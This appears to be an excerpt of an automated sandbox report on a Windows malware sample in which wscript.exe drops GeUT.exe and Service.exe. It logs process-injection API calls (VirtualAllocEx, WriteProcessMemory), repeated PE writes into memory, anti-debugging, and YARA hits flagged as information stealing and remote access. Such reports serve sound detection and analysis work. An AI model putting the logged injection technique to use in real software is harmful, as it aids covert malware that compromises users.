Source: C:\Users\user\AppData\Roaming\Service.exe	Thread delayed: delay time: 922337203685477

Source: GeUT.exe, 00000003.00000002.3408146583.0000000000A6B000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\AppData\Local\Temp\GeUT.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Source: C:\Users\user\AppData\Local\Temp\GeUT.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\wscript.exe

File created: GeUT.exe.0.dr

Jump to dropped file

Source: 2.2.GeUT.exe.2834784.2.raw.unpack, reflect.cs	Reference to suspicious API methods: ReadProcessMemory(processInformation.ProcessHandle, num3 + 8, ref buffer, 4, ref bytesRead)
Source: 2.2.GeUT.exe.2834784.2.raw.unpack, reflect.cs	Reference to suspicious API methods: VirtualAllocEx(processInformation.ProcessHandle, num2, length, 12288, 64)
Source: 2.2.GeUT.exe.2834784.2.raw.unpack, reflect.cs	Reference to suspicious API methods: WriteProcessMemory(processInformation.ProcessHandle, num4, data, bufferSize, ref bytesRead)

Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Memory written: C:\Users\user\AppData\Local\Temp\GeUT.exe base: 790000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Memory written: C:\Users\user\AppData\Local\Temp\GeUT.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Memory written: C:\Users\user\AppData\Local\Temp\GeUT.exe base: 390000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Memory written: C:\Users\user\AppData\Local\Temp\GeUT.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Memory written: C:\Users\user\AppData\Local\Temp\GeUT.exe base: 500000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Memory written: C:\Users\user\AppData\Local\Temp\GeUT.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory written: C:\Users\user\AppData\Roaming\Service.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory written: C:\Users\user\AppData\Roaming\Service.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory written: C:\Users\user\AppData\Roaming\Service.exe base: 370000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory written: C:\Users\user\AppData\Roaming\Service.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory written: C:\Users\user\AppData\Roaming\Service.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Memory written: C:\Users\user\AppData\Local\Temp\GeUT.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Memory written: C:\Users\user\AppData\Local\Temp\GeUT.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Memory written: C:\Users\user\AppData\Local\Temp\GeUT.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Memory written: C:\Users\user\AppData\Local\Temp\GeUT.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Memory written: C:\Users\user\AppData\Local\Temp\GeUT.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory written: C:\Users\user\AppData\Roaming\Service.exe base: 770000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory written: C:\Users\user\AppData\Roaming\Service.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory written: C:\Users\user\AppData\Roaming\Service.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory written: C:\Users\user\AppData\Roaming\Service.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory written: C:\Users\user\AppData\Roaming\Service.exe base: 400000 value starts with: 4D5A

Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
Source: C:\Users\user\AppData\Roaming\Service.exe	Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Users\user\AppData\Roaming\Service.exe	Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Users\user\AppData\Roaming\Service.exe	Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Users\user\AppData\Roaming\Service.exe	Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Users\user\AppData\Roaming\Service.exe	Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"

Language, Device and Operating System Detection

Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\GeUT.exe VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\GeUT.exe VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\GeUT.exe VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\GeUT.exe VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\GeUT.exe VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\GeUT.exe VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\GeUT.exe VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\GeUT.exe VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Queries volume information: C:\Users\user\AppData\Roaming\Service.exe VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Queries volume information: C:\Users\user\AppData\Roaming\Service.exe VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Queries volume information: C:\Users\user\AppData\Roaming\Service.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe	Queries volume information: C:\Users\user\AppData\Roaming\Service.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe	Queries volume information: C:\Users\user\AppData\Roaming\Service.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe	Queries volume information: C:\Users\user\AppData\Roaming\Service.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\GeUT.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\GeUT.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\GeUT.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\GeUT.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\GeUT.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\GeUT.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe	Queries volume information: C:\Users\user\AppData\Roaming\Service.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe	Queries volume information: C:\Users\user\AppData\Roaming\Service.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe	Queries volume information: C:\Users\user\AppData\Roaming\Service.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe	Queries volume information: C:\Users\user\AppData\Roaming\Service.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe	Queries volume information: C:\Users\user\AppData\Roaming\Service.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe	Queries volume information: C:\Users\user\AppData\Roaming\Service.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Source: GeUT.exe.0.dr, Program.cs	.Net Code: TaskMan
Source: 0.3.wscript.exe.26357946390.0.raw.unpack, Program.cs	.Net Code: TaskMan
Source: 0.2.wscript.exe.263586370e0.0.raw.unpack, Program.cs	.Net Code: TaskMan
Source: Service.exe.2.dr, Program.cs	.Net Code: TaskMan

Stealing of Sensitive Information

Source: Yara match	File source: 5.2.GeUT.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.GeUT.exe.28363bc.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.GeUT.exe.2838018.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.GeUT.exe.2834784.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.GeUT.exe.3376aa4.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.GeUT.exe.3374e60.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.Service.exe.28d801c.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.GeUT.exe.3378700.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.Service.exe.28d4788.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.Service.exe.28d63c0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.2282391567.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2255004351.0000000003359000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2147849334.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2338909006.0000000002891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: GeUT.exe PID: 3784, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: GeUT.exe PID: 3516, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: GeUT.exe PID: 4948, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Service.exe PID: 7072, type: MEMORYSTR

Remote Access Functionality

Source: Yara match	File source: 5.2.GeUT.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.GeUT.exe.28363bc.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.GeUT.exe.2838018.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.GeUT.exe.2834784.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.GeUT.exe.3376aa4.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.GeUT.exe.3374e60.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.Service.exe.28d801c.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.GeUT.exe.3378700.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.Service.exe.28d4788.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.Service.exe.28d63c0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.2282391567.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2255004351.0000000003359000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2147849334.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2338909006.0000000002891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: GeUT.exe PID: 3784, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: GeUT.exe PID: 3516, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: GeUT.exe PID: 4948, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Service.exe PID: 7072, type: MEMORYSTR